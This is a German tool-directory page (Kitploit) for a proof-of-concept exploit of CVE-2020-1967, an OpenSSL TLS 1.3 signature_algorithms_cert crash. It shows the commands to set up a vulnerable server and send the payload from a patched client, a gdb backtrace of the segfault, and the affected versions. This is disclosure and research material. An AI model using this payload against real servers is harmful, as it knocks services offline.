Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-1967 — Proof-of-Concept-Exploit zur OpenSSL signature_algorithms_cert DoS-Schwachstelle (CVE-2020-1967) | Kitploit
Tools/GitHubGitHub/irsl/cve-2020-1967
SchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHubirsl/cve-2020-1967

CVE-2020-1967

Proof-of-Concept-Exploit zur OpenSSL signature_algorithms_cert DoS-Schwachstelle (CVE-2020-1967)

Repository anzeigen
205vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-1967

Proof-of-Concept-Exploit für die OpenSSL-signature_algorithms_cert-DoS-Schwachstelle (CVE-2020-1967). Der ursprüngliche Fund geht auf Bernd Edlinger zurück, weitere Analysen stammen von Matt Caswell und Benjamin Kaduk, diese Demo von Imre Rad.

Voraussetzung

Server- oder Client-Anwendungen, die die SSL_check_chain()-Funktion während oder nach einem TLS-1.3-Handshake aufrufen. Laut Dokumentation prüft SSL_check_chain(), ob das Zertifikat x, der private Schlüssel pk und die Zertifikatskette chain für die aktuelle Sitzung s geeignet sind. Dieser Funktionsaufruf ist NICHT in den populären Projekten Apache httpd oder Nginx vorhanden.

Demo

Um diese Schwachstelle auszunutzen, muss eine manipulierte signature_algorithms_cert TLS-Erweiterung als Teil der Hello-Nachricht übermittelt werden. Ich habe eine gepatchte Version der OpenSSL-Bibliothek verwendet, um einen solchen Client zu erstellen; der Server ist die integrierte s_server-OpenSSL-App, zusammen mit der Option -x, um den Codepfad zu aktivieren, der SSL_check_chain aufruft.

Einrichten des Servers auf einem Debian Stable (unter expliziter Verwendung der anfälligen Version):

root@kitploit:~
root@489def7f3594:/data# apt install libssl1.1=1.1.1d-0+deb10u2 openssl=1.1.1d-0+deb10u2
...

root@489def7f3594:/data# openssl version
OpenSSL 1.1.1d  10 Sep 2019

root@489def7f3594:/data# openssl s_server -cert cert.pem -key key.pem  -accept 8443 -verify 1 -tls1_3 -xkey key.pem -xcert cert.pem  -xchain cert.pem
verify depth is 1
Using default temp DH parameters
ACCEPT

Senden der Nutzlast mit dem gepatchten Client:

root@kitploit:~
root@489def7f3594:/data# /path/to/patched/openssl s_client -connect 127.0.0.1:8443 -tls1_3 -cert cert.pem -key key.pem -sigalgs rsa_pss_rsae_sha256
CONNECTED(00000004)
Sending CVE-2020-1967 payload
...

Und der Server sollte an dieser Stelle einen Segfault auslösen. Der Core-Dump sieht wie folgt aus:

root@kitploit:~
root@489def7f3594:/data/1# gdb /data/openssl-1.1.1d/apps/openssl core
GNU gdb (Ubuntu 9.1-0ubuntu1) 9.1
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /data/openssl-1.1.1d/apps/openssl...
(No debugging symbols found in /data/openssl-1.1.1d/apps/openssl)
[New LWP 26319]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Core was generated by `/data/openssl-1.1.1d/apps/openssl s_server -cert cert.pem -key key.pem -accept'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so
(gdb) bt
#0  0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so
#1  0x00007f09bd03f309 in tls1_check_chain () from /data/openssl-1.1.1d/libssl.so
#2  0x00007f09bd403fc8 in set_cert_cb ()
#3  0x00007f09bd037f75 in tls_post_process_client_hello () from /data/openssl-1.1.1d/libssl.so
#4  0x00007f09bd02703f in state_machine.part () from /data/openssl-1.1.1d/libssl.so
#5  0x00007f09bcffa3f8 in ssl3_write_bytes () from /data/openssl-1.1.1d/libssl.so
#6  0x00007f09bd00fbb9 in ssl_write_internal () from /data/openssl-1.1.1d/libssl.so
#7  0x00007f09bd00fd07 in SSL_write () from /data/openssl-1.1.1d/libssl.so
#8  0x00007f09bd3e337d in sv_body ()
#9  0x00007f09bd40757a in do_server ()
#10 0x00007f09bd3e7c27 in s_server_main ()
#11 0x00007f09bd3cea46 in do_cmd ()
#12 0x00007f09bd3b89fd in main ()

Betroffene Versionen

Betroffene Versionen sind: OpenSSL 1.1.1d, 1.1.1e und 1.1.1f. Die erste behobene Version ist OpenSSL 1.1.1g.

Referenzen

  • https://www.openssl.org/news/secadv/20200421.txt

  • https://github.com/openssl/openssl/issues/11500

  • https://github.com/openssl/openssl/commit/a87f3fe01a5a894aa27ccd6a239155fd129988e4

Tool herunterladen